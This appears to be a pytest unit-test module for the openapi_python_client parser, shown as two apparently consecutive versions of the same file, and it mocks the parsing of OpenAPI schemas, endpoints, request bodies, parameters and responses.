result = Endpoint._add_body(endpoint, oai.Operation.construct(requestBody=request_body))
assert result == ParseError(detail=f"cannot parse body of endpoint {endpoint.name}", data=parse_error.data)
def test_add_body_happy(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, Reference
from openapi_python_client.parser.properties import Property
request_body = mocker.MagicMock()
form_body_reference = Reference.from_ref(ref="a")
multipart_body_reference = Reference.from_ref(ref="b")
parse_request_form_body = mocker.patch.object(
Endpoint, "parse_request_form_body", return_value=form_body_reference
)
parse_multipart_body = mocker.patch.object(
Endpoint, "parse_multipart_body", return_value=multipart_body_reference
)
json_body = mocker.MagicMock(autospec=Property)
json_body_imports = mocker.MagicMock()
json_body.get_imports.return_value = {json_body_imports}
parse_request_json_body = mocker.patch.object(Endpoint, "parse_request_json_body", return_value=json_body)
import_string_from_reference = mocker.patch(
f"{MODULE_NAME}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
endpoint = Endpoint._add_body(endpoint, oai.Operation.construct(requestBody=request_body))
parse_request_form_body.assert_called_once_with(request_body)
parse_request_json_body.assert_called_once_with(request_body)
parse_multipart_body.assert_called_once_with(request_body)
import_string_from_reference.assert_has_calls(
[
mocker.call(form_body_reference, prefix="..models"),
mocker.call(multipart_body_reference, prefix="..models"),
]
)
json_body.get_imports.assert_called_once_with(prefix="..models")
assert endpoint.relative_imports == {"import_1", "import_2", "import_3", json_body_imports}
assert endpoint.json_body == json_body
assert endpoint.form_body_reference == form_body_reference
assert endpoint.multipart_body_reference == multipart_body_reference
def test__add_responses_error(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
response_1_data = mocker.MagicMock()
response_2_data = mocker.MagicMock()
data = {
"200": response_1_data,
"404": response_2_data,
}
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
parse_error = ParseError(data=mocker.MagicMock())
response_from_data = mocker.patch(f"{MODULE_NAME}.response_from_data", return_value=parse_error)
response = Endpoint._add_responses(endpoint, data)
response_from_data.assert_called_once_with(status_code=200, data=response_1_data)
assert response == ParseError(
detail=f"cannot parse response of endpoint {endpoint.name}", data=parse_error.data
)
def test__add_responses(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, Reference, RefResponse
response_1_data = mocker.MagicMock()
response_2_data = mocker.MagicMock()
data = {
"200": response_1_data,
"404": response_2_data,
}
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
ref_1 = Reference.from_ref(ref="ref_1")
ref_2 = Reference.from_ref(ref="ref_2")
response_1 = RefResponse(status_code=200, reference=ref_1)
response_2 = RefResponse(status_code=404, reference=ref_2)
response_from_data = mocker.patch(f"{MODULE_NAME}.response_from_data", side_effect=[response_1, response_2])
import_string_from_reference = mocker.patch(
f"{MODULE_NAME}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
endpoint = Endpoint._add_responses(endpoint, data)
response_from_data.assert_has_calls(
[mocker.call(status_code=200, data=response_1_data), mocker.call(status_code=404, data=response_2_data),]
)
import_string_from_reference.assert_has_calls(
[mocker.call(ref_1, prefix="..models"), mocker.call(ref_2, prefix="..models"),]
)
assert endpoint.responses == [response_1, response_2]
assert endpoint.relative_imports == {"import_1", "import_2", "import_3"}
def test__add_parameters_handles_no_params(self):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
# Just checking there's no exception here
assert Endpoint._add_parameters(endpoint, oai.Operation.construct()) == endpoint
def test__add_parameters_parse_error(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
parse_error = ParseError(data=mocker.MagicMock())
mocker.patch(f"{MODULE_NAME}.property_from_data", return_value=parse_error)
param = oai.Parameter.construct(name="test", required=True, param_schema=mocker.MagicMock(), param_in="cookie")
result = Endpoint._add_parameters(endpoint, oai.Operation.construct(parameters=[param]))
assert result == ParseError(data=parse_error.data, detail=f"cannot parse parameter of endpoint {endpoint.name}")
def test__add_parameters_fail_loudly_when_location_not_supported(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
mocker.patch(f"{MODULE_NAME}.property_from_data")
param = oai.Parameter.construct(name="test", required=True, param_schema=mocker.MagicMock(), param_in="cookie")
result = Endpoint._add_parameters(endpoint, oai.Operation.construct(parameters=[param]))
assert result == ParseError(data=param, detail="Parameter must be declared in path or query")
def test__add_parameters_happy(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
from openapi_python_client.parser.properties import Property
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
path_prop = mocker.MagicMock(autospec=Property)
path_prop_import = mocker.MagicMock()
path_prop.get_imports = mocker.MagicMock(return_value={path_prop_import})
query_prop = mocker.MagicMock(autospec=Property)
query_prop_import = mocker.MagicMock()
query_prop.get_imports = mocker.MagicMock(return_value={query_prop_import})
header_prop = mocker.MagicMock(autospec=Property)
header_prop_import = mocker.MagicMock()
header_prop.get_imports = mocker.MagicMock(return_value={header_prop_import})
property_from_data = mocker.patch(
f"{MODULE_NAME}.property_from_data", side_effect=[path_prop, query_prop, header_prop]
)
path_schema = mocker.MagicMock()
query_schema = mocker.MagicMock()
header_schema = mocker.MagicMock()
data = oai.Operation.construct(
parameters=[
oai.Parameter.construct(
name="path_prop_name", required=True, param_schema=path_schema, param_in="path"
),
oai.Parameter.construct(
name="query_prop_name", required=False, param_schema=query_schema, param_in="query"
),
oai.Parameter.construct(
name="header_prop_name", required=False, param_schema=header_schema, param_in="header"
),
oai.Reference.construct(), # Should be ignored
oai.Parameter.construct(), # Should be ignored
]
)
endpoint = Endpoint._add_parameters(endpoint, data)
property_from_data.assert_has_calls(
[
mocker.call(name="path_prop_name", required=True, data=path_schema),
mocker.call(name="query_prop_name", required=False, data=query_schema),
mocker.call(name="header_prop_name", required=False, data=header_schema),
]
)
path_prop.get_imports.assert_called_once_with(prefix="..models")
query_prop.get_imports.assert_called_once_with(prefix="..models")
header_prop.get_imports.assert_called_once_with(prefix="..models")
assert endpoint.relative_imports == {"import_3", path_prop_import, query_prop_import, header_prop_import}
assert endpoint.path_parameters == [path_prop]
assert endpoint.query_parameters == [query_prop]
assert endpoint.header_parameters == [header_prop]
def test_from_data_bad_params(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
parse_error = ParseError(data=mocker.MagicMock())
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters", return_value=parse_error)
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
result = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert result == parse_error
def test_from_data_bad_responses(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
parse_error = ParseError(data=mocker.MagicMock())
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters")
_add_responses = mocker.patch.object(Endpoint, "_add_responses", return_value=parse_error)
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
result = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert result == parse_error
def test_from_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters")
_add_responses = mocker.patch.object(Endpoint, "_add_responses")
_add_body = mocker.patch.object(Endpoint, "_add_body")
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
endpoint = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert endpoint == _add_body.return_value
_add_parameters.assert_called_once_with(
Endpoint(
path=path,
method=method,
description=data.description,
name=data.operationId,
requires_security=True,
tag="default",
),
data,
)
_add_responses.assert_called_once_with(_add_parameters.return_value, data.responses)
_add_body.assert_called_once_with(_add_responses.return_value, data)
data.security = None
_add_parameters.reset_mock()
Endpoint.from_data(data=data, path=path, method=method, tag="a")
_add_parameters.assert_called_once_with(
Endpoint(
path=path,
method=method,
description=data.description,
name=data.operationId,
requires_security=False,
tag="a",
),
data,
)
data.operationId = None
assert Endpoint.from_data(data=data, path=path, method=method, tag="a") == ParseError(
data=data, detail="Path operations with operationId are not yet supported"
)
class TestImportStringFromReference:
def test_import_string_from_reference_no_prefix(self, mocker):
from openapi_python_client.parser.openapi import import_string_from_reference
from openapi_python_client.parser.reference import Reference
reference = mocker.MagicMock(autospec=Reference)
result = import_string_from_reference(reference)
assert result == f"from .{reference.module_name} import {reference.class_name}"
def test_import_string_from_reference_with_prefix(self, mocker):
from openapi_python_client.parser.openapi import import_string_from_reference
from openapi_python_client.parser.reference import Reference
prefix = mocker.MagicMock(autospec=str)
reference = mocker.MagicMock(autospec=Reference)
result = import_string_from_reference(reference=reference, prefix=prefix)
assert result == f"from {prefix}.{reference.module_name} import {reference.class_name}"
class TestEndpointCollection:
def test_from_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, EndpointCollection
path_1_put = oai.Operation.construct()
path_1_post = oai.Operation.construct(tags=["tag_2", "tag_3"])
path_2_get = oai.Operation.construct()
data = {
"path_1": oai.PathItem.construct(post=path_1_post, put=path_1_put),
"path_2": oai.PathItem.construct(get=path_2_get),
}
endpoint_1 = mocker.MagicMock(autospec=Endpoint, tag="default", relative_imports={"1", "2"})
endpoint_2 = mocker.MagicMock(autospec=Endpoint, tag="tag_2", relative_imports={"2"})
endpoint_3 = mocker.MagicMock(autospec=Endpoint, tag="default", relative_imports={"2", "3"})
endpoint_from_data = mocker.patch.object(
Endpoint, "from_data", side_effect=[endpoint_1, endpoint_2, endpoint_3]
)
result = EndpointCollection.from_data(data=data)
endpoint_from_data.assert_has_calls(
[
mocker.call(data=path_1_put, path="path_1", method="put", tag="default"),
mocker.call(data=path_1_post, path="path_1", method="post", tag="tag_2"),
mocker.call(data=path_2_get, path="path_2", method="get", tag="default"),
],
)
assert result == {
"default": EndpointCollection(
"default", endpoints=[endpoint_1, endpoint_3], relative_imports={"1", "2", "3"}
),
"tag_2": EndpointCollection("tag_2", endpoints=[endpoint_2], relative_imports={"2"}),
}
def test_from_data_errors(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, EndpointCollection, ParseError
path_1_put = oai.Operation.construct()
path_1_post = oai.Operation.construct(tags=["tag_2", "tag_3"])
path_2_get = oai.Operation.construct()
data = {
"path_1": oai.PathItem.construct(post=path_1_post, put=path_1_put),
"path_2": oai.PathItem.construct(get=path_2_get),
}
endpoint_from_data = mocker.patch.object(
Endpoint, "from_data", side_effect=[ParseError(data="1"), ParseError(data="2"), ParseError(data="3")]
)
result = EndpointCollection.from_data(data=data)
endpoint_from_data.assert_has_calls(
[
mocker.call(data=path_1_put, path="path_1", method="put", tag="default"),
mocker.call(data=path_1_post, path="path_1", method="post", tag="tag_2"),
mocker.call(data=path_2_get, path="path_2", method="get", tag="default"),
],
)
assert result["default"].parse_errors[0].data == "1"
assert result["default"].parse_errors[1].data == "3"
assert result["tag_2"].parse_errors[0].data == "2"
| from pydantic import ValidationError
from pydantic.error_wrappers import ErrorWrapper
import openapi_python_client.schema as oai
from openapi_python_client import GeneratorError, utils
from openapi_python_client.parser.errors import ParseError
MODULE_NAME = "openapi_python_client.parser.openapi"
class TestGeneratorData:
def test_from_dict(self, mocker):
Schemas = mocker.patch(f"{MODULE_NAME}.Schemas")
EndpointCollection = mocker.patch(f"{MODULE_NAME}.EndpointCollection")
OpenAPI = mocker.patch(f"{MODULE_NAME}.oai.OpenAPI")
openapi = OpenAPI.parse_obj.return_value
in_dict = mocker.MagicMock()
get_all_enums = mocker.patch(f"{MODULE_NAME}.EnumProperty.get_all_enums")
from openapi_python_client.parser.openapi import GeneratorData
generator_data = GeneratorData.from_dict(in_dict)
OpenAPI.parse_obj.assert_called_once_with(in_dict)
Schemas.build.assert_called_once_with(schemas=openapi.components.schemas)
EndpointCollection.from_data.assert_called_once_with(data=openapi.paths)
get_all_enums.assert_called_once_with()
assert generator_data == GeneratorData(
title=openapi.info.title,
description=openapi.info.description,
version=openapi.info.version,
endpoint_collections_by_tag=EndpointCollection.from_data.return_value,
schemas=Schemas.build.return_value,
enums=get_all_enums.return_value,
)
# Test no components
openapi.components = None
Schemas.build.reset_mock()
generator_data = GeneratorData.from_dict(in_dict)
Schemas.build.assert_not_called()
assert generator_data.schemas == Schemas()
def test_from_dict_invalid_schema(self, mocker):
Schemas = mocker.patch(f"{MODULE_NAME}.Schemas")
in_dict = {}
from openapi_python_client.parser.openapi import GeneratorData
generator_data = GeneratorData.from_dict(in_dict)
assert generator_data == GeneratorError(
header="Failed to parse OpenAPI document",
detail=(
"2 validation errors for OpenAPI\n"
"info\n"
" field required (type=value_error.missing)\n"
"paths\n"
" field required (type=value_error.missing)"
),
)
Schemas.build.assert_not_called()
Schemas.assert_not_called()
class TestModel:
def test_from_data(self, mocker):
from openapi_python_client.parser.properties import Property
in_data = oai.Schema.construct(
title=mocker.MagicMock(),
description=mocker.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": mocker.MagicMock(), "OptionalDateTime": mocker.MagicMock(),},
)
required_property = mocker.MagicMock(autospec=Property)
required_imports = mocker.MagicMock()
required_property.get_imports.return_value = {required_imports}
optional_property = mocker.MagicMock(autospec=Property)
optional_imports = mocker.MagicMock()
optional_property.get_imports.return_value = {optional_imports}
property_from_data = mocker.patch(
f"{MODULE_NAME}.property_from_data", side_effect=[required_property, optional_property],
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
result = Model.from_data(data=in_data, name=mocker.MagicMock())
from_ref.assert_called_once_with(in_data.title)
property_from_data.assert_has_calls(
[
mocker.call(name="RequiredEnum", required=True, data=in_data.properties["RequiredEnum"]),
mocker.call(name="OptionalDateTime", required=False, data=in_data.properties["OptionalDateTime"]),
]
)
required_property.get_imports.assert_called_once_with(prefix="")
optional_property.get_imports.assert_called_once_with(prefix="")
assert result == Model(
reference=from_ref(),
required_properties=[required_property],
optional_properties=[optional_property],
relative_imports={required_imports, optional_imports,},
description=in_data.description,
)
def test_from_data_property_parse_error(self, mocker):
in_data = oai.Schema.construct(
title=mocker.MagicMock(),
description=mocker.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": mocker.MagicMock(), "OptionalDateTime": mocker.MagicMock(),},
)
parse_error = ParseError(data=mocker.MagicMock())
property_from_data = mocker.patch(f"{MODULE_NAME}.property_from_data", return_value=parse_error,)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
result = Model.from_data(data=in_data, name=mocker.MagicMock())
from_ref.assert_called_once_with(in_data.title)
property_from_data.assert_called_once_with(
name="RequiredEnum", required=True, data=in_data.properties["RequiredEnum"]
)
assert result == parse_error
class TestSchemas:
def test_build(self, mocker):
from_data = mocker.patch(f"{MODULE_NAME}.Model.from_data")
in_data = {"1": mocker.MagicMock(enum=None), "2": mocker.MagicMock(enum=None), "3": mocker.MagicMock(enum=None)}
schema_1 = mocker.MagicMock()
schema_2 = mocker.MagicMock()
error = ParseError()
from_data.side_effect = [schema_1, schema_2, error]
from openapi_python_client.parser.openapi import Schemas
result = Schemas.build(schemas=in_data)
from_data.assert_has_calls([mocker.call(data=value, name=name) for (name, value) in in_data.items()])
assert result == Schemas(
models={schema_1.reference.class_name: schema_1, schema_2.reference.class_name: schema_2,}, errors=[error]
)
def test_build_parse_error_on_reference(self):
from openapi_python_client.parser.openapi import Schemas
ref_schema = oai.Reference.construct()
in_data = {1: ref_schema}
result = Schemas.build(schemas=in_data)
assert result.errors[0] == ParseError(data=ref_schema, detail="Reference schemas are not supported.")
def test_build_enums(self, mocker):
from openapi_python_client.parser.openapi import Schemas
from_data = mocker.patch(f"{MODULE_NAME}.Model.from_data")
enum_property = mocker.patch(f"{MODULE_NAME}.EnumProperty")
in_data = {"1": mocker.MagicMock(enum=["val1", "val2", "val3"])}
Schemas.build(schemas=in_data)
enum_property.assert_called()
from_data.assert_not_called()
class TestEndpoint:
def test_parse_request_form_body(self, mocker):
ref = mocker.MagicMock()
body = oai.RequestBody.construct(
content={
"application/x-www-form-urlencoded": oai.MediaType.construct(
media_type_schema=oai.Reference.construct(ref=ref)
)
}
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_form_body(body)
from_ref.assert_called_once_with(ref)
assert result == from_ref()
def test_parse_request_form_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_form_body(body)
assert result is None
def test_parse_multipart_body(self, mocker):
ref = mocker.MagicMock()
body = oai.RequestBody.construct(
content={"multipart/form-data": oai.MediaType.construct(media_type_schema=oai.Reference.construct(ref=ref))}
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_multipart_body(body)
from_ref.assert_called_once_with(ref)
assert result == from_ref()
def test_parse_multipart_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_multipart_body(body)
assert result is None
def test_parse_request_json_body(self, mocker):
schema = mocker.MagicMock()
body = oai.RequestBody.construct(
content={"application/json": oai.MediaType.construct(media_type_schema=schema)}
)
property_from_data = mocker.patch(f"{MODULE_NAME}.property_from_data")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_json_body(body)
property_from_data.assert_called_once_with("json_body", required=True, data=schema)
assert result == property_from_data()
def test_parse_request_json_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_json_body(body)
assert result is None
def test_add_body_no_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
parse_request_form_body = mocker.patch.object(Endpoint, "parse_request_form_body")
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
Endpoint._add_body(endpoint, oai.Operation.construct())
parse_request_form_body.assert_not_called()
def test_add_body_bad_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
mocker.patch.object(Endpoint, "parse_request_form_body")
parse_error = ParseError(data=mocker.MagicMock())
mocker.patch.object(Endpoint, "parse_request_json_body", return_value=parse_error)
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
request_body = mocker.MagicMock()
result = Endpoint._add_body(endpoint, oai.Operation.construct(requestBody=request_body))
assert result == ParseError(detail=f"cannot parse body of endpoint {endpoint.name}", data=parse_error.data)
def test_add_body_happy(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, Reference
from openapi_python_client.parser.properties import Property
request_body = mocker.MagicMock()
form_body_reference = Reference.from_ref(ref="a")
multipart_body_reference = Reference.from_ref(ref="b")
parse_request_form_body = mocker.patch.object(
Endpoint, "parse_request_form_body", return_value=form_body_reference
)
parse_multipart_body = mocker.patch.object(
Endpoint, "parse_multipart_body", return_value=multipart_body_reference
)
json_body = mocker.MagicMock(autospec=Property)
json_body_imports = mocker.MagicMock()
json_body.get_imports.return_value = {json_body_imports}
parse_request_json_body = mocker.patch.object(Endpoint, "parse_request_json_body", return_value=json_body)
import_string_from_reference = mocker.patch(
f"{MODULE_NAME}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
endpoint = Endpoint._add_body(endpoint, oai.Operation.construct(requestBody=request_body))
parse_request_form_body.assert_called_once_with(request_body)
parse_request_json_body.assert_called_once_with(request_body)
parse_multipart_body.assert_called_once_with(request_body)
import_string_from_reference.assert_has_calls(
[
mocker.call(form_body_reference, prefix="..models"),
mocker.call(multipart_body_reference, prefix="..models"),
]
)
json_body.get_imports.assert_called_once_with(prefix="..models")
assert endpoint.relative_imports == {"import_1", "import_2", "import_3", json_body_imports}
assert endpoint.json_body == json_body
assert endpoint.form_body_reference == form_body_reference
assert endpoint.multipart_body_reference == multipart_body_reference
def test__add_responses_error(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
response_1_data = mocker.MagicMock()
response_2_data = mocker.MagicMock()
data = {
"200": response_1_data,
"404": response_2_data,
}
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
parse_error = ParseError(data=mocker.MagicMock())
response_from_data = mocker.patch(f"{MODULE_NAME}.response_from_data", return_value=parse_error)
response = Endpoint._add_responses(endpoint, data)
response_from_data.assert_called_once_with(status_code=200, data=response_1_data)
assert response == ParseError(
detail=f"cannot parse response of endpoint {endpoint.name}", data=parse_error.data
)
def test__add_responses(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, Reference, RefResponse
response_1_data = mocker.MagicMock()
response_2_data = mocker.MagicMock()
data = {
"200": response_1_data,
"404": response_2_data,
}
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
ref_1 = Reference.from_ref(ref="ref_1")
ref_2 = Reference.from_ref(ref="ref_2")
response_1 = RefResponse(status_code=200, reference=ref_1)
response_2 = RefResponse(status_code=404, reference=ref_2)
response_from_data = mocker.patch(f"{MODULE_NAME}.response_from_data", side_effect=[response_1, response_2])
import_string_from_reference = mocker.patch(
f"{MODULE_NAME}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
endpoint = Endpoint._add_responses(endpoint, data)
response_from_data.assert_has_calls(
[mocker.call(status_code=200, data=response_1_data), mocker.call(status_code=404, data=response_2_data),]
)
import_string_from_reference.assert_has_calls(
[mocker.call(ref_1, prefix="..models"), mocker.call(ref_2, prefix="..models"),]
)
assert endpoint.responses == [response_1, response_2]
assert endpoint.relative_imports == {"import_1", "import_2", "import_3"}
def test__add_parameters_handles_no_params(self):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
# Just checking there's no exception here
assert Endpoint._add_parameters(endpoint, oai.Operation.construct()) == endpoint
def test__add_parameters_parse_error(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
parse_error = ParseError(data=mocker.MagicMock())
mocker.patch(f"{MODULE_NAME}.property_from_data", return_value=parse_error)
param = oai.Parameter.construct(name="test", required=True, param_schema=mocker.MagicMock(), param_in="cookie")
result = Endpoint._add_parameters(endpoint, oai.Operation.construct(parameters=[param]))
assert result == ParseError(data=parse_error.data, detail=f"cannot parse parameter of endpoint {endpoint.name}")
def test__add_parameters_fail_loudly_when_location_not_supported(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
mocker.patch(f"{MODULE_NAME}.property_from_data")
param = oai.Parameter.construct(name="test", required=True, param_schema=mocker.MagicMock(), param_in="cookie")
result = Endpoint._add_parameters(endpoint, oai.Operation.construct(parameters=[param]))
assert result == ParseError(data=param, detail="Parameter must be declared in path or query")
def test__add_parameters_happy(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
from openapi_python_client.parser.properties import Property
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
path_prop = mocker.MagicMock(autospec=Property)
path_prop_import = mocker.MagicMock()
path_prop.get_imports = mocker.MagicMock(return_value={path_prop_import})
query_prop = mocker.MagicMock(autospec=Property)
query_prop_import = mocker.MagicMock()
query_prop.get_imports = mocker.MagicMock(return_value={query_prop_import})
header_prop = mocker.MagicMock(autospec=Property)
header_prop_import = mocker.MagicMock()
header_prop.get_imports = mocker.MagicMock(return_value={header_prop_import})
property_from_data = mocker.patch(
f"{MODULE_NAME}.property_from_data", side_effect=[path_prop, query_prop, header_prop]
)
path_schema = mocker.MagicMock()
query_schema = mocker.MagicMock()
header_schema = mocker.MagicMock()
data = oai.Operation.construct(
parameters=[
oai.Parameter.construct(
name="path_prop_name", required=True, param_schema=path_schema, param_in="path"
),
oai.Parameter.construct(
name="query_prop_name", required=False, param_schema=query_schema, param_in="query"
),
oai.Parameter.construct(
name="header_prop_name", required=False, param_schema=header_schema, param_in="header"
),
oai.Reference.construct(), # Should be ignored
oai.Parameter.construct(), # Should be ignored
]
)
endpoint = Endpoint._add_parameters(endpoint, data)
property_from_data.assert_has_calls(
[
mocker.call(name="path_prop_name", required=True, data=path_schema),
mocker.call(name="query_prop_name", required=False, data=query_schema),
mocker.call(name="header_prop_name", required=False, data=header_schema),
]
)
path_prop.get_imports.assert_called_once_with(prefix="..models")
query_prop.get_imports.assert_called_once_with(prefix="..models")
header_prop.get_imports.assert_called_once_with(prefix="..models")
assert endpoint.relative_imports == {"import_3", path_prop_import, query_prop_import, header_prop_import}
assert endpoint.path_parameters == [path_prop]
assert endpoint.query_parameters == [query_prop]
assert endpoint.header_parameters == [header_prop]
def test_from_data_bad_params(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
parse_error = ParseError(data=mocker.MagicMock())
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters", return_value=parse_error)
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
result = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert result == parse_error
def test_from_data_bad_responses(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
parse_error = ParseError(data=mocker.MagicMock())
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters")
_add_responses = mocker.patch.object(Endpoint, "_add_responses", return_value=parse_error)
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
result = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert result == parse_error
def test_from_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters")
_add_responses = mocker.patch.object(Endpoint, "_add_responses")
_add_body = mocker.patch.object(Endpoint, "_add_body")
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=data.description)
endpoint = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert endpoint == _add_body.return_value
_add_parameters.assert_called_once_with(
Endpoint(
path=path,
method=method,
description=data.description,
name=data.operationId,
requires_security=True,
tag="default",
),
data,
)
_add_responses.assert_called_once_with(_add_parameters.return_value, data.responses)
_add_body.assert_called_once_with(_add_responses.return_value, data)
data.security = None
_add_parameters.reset_mock()
Endpoint.from_data(data=data, path=path, method=method, tag="a")
_add_parameters.assert_called_once_with(
Endpoint(
path=path,
method=method,
description=data.description,
name=data.operationId,
requires_security=False,
tag="a",
),
data,
)
data.operationId = None
assert Endpoint.from_data(data=data, path=path, method=method, tag="a") == ParseError(
data=data, detail="Path operations with operationId are not yet supported"
)
class TestImportStringFromReference:
def test_import_string_from_reference_no_prefix(self, mocker):
from openapi_python_client.parser.openapi import import_string_from_reference
from openapi_python_client.parser.reference import Reference
reference = mocker.MagicMock(autospec=Reference)
result = import_string_from_reference(reference)
assert result == f"from .{reference.module_name} import {reference.class_name}"
def test_import_string_from_reference_with_prefix(self, mocker):
from openapi_python_client.parser.openapi import import_string_from_reference
from openapi_python_client.parser.reference import Reference
prefix = mocker.MagicMock(autospec=str)
reference = mocker.MagicMock(autospec=Reference)
result = import_string_from_reference(reference=reference, prefix=prefix)
assert result == f"from {prefix}.{reference.module_name} import {reference.class_name}"
class TestEndpointCollection:
def test_from_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, EndpointCollection
path_1_put = oai.Operation.construct()
path_1_post = oai.Operation.construct(tags=["tag_2", "tag_3"])
path_2_get = oai.Operation.construct()
data = {
"path_1": oai.PathItem.construct(post=path_1_post, put=path_1_put),
"path_2": oai.PathItem.construct(get=path_2_get),
}
endpoint_1 = mocker.MagicMock(autospec=Endpoint, tag="default", relative_imports={"1", "2"})
endpoint_2 = mocker.MagicMock(autospec=Endpoint, tag="tag_2", relative_imports={"2"})
endpoint_3 = mocker.MagicMock(autospec=Endpoint, tag="default", relative_imports={"2", "3"})
endpoint_from_data = mocker.patch.object(
Endpoint, "from_data", side_effect=[endpoint_1, endpoint_2, endpoint_3]
)
result = EndpointCollection.from_data(data=data)
endpoint_from_data.assert_has_calls(
[
mocker.call(data=path_1_put, path="path_1", method="put", tag="default"),
mocker.call(data=path_1_post, path="path_1", method="post", tag="tag_2"),
mocker.call(data=path_2_get, path="path_2", method="get", tag="default"),
],
)
assert result == {
"default": EndpointCollection(
"default", endpoints=[endpoint_1, endpoint_3], relative_imports={"1", "2", "3"}
),
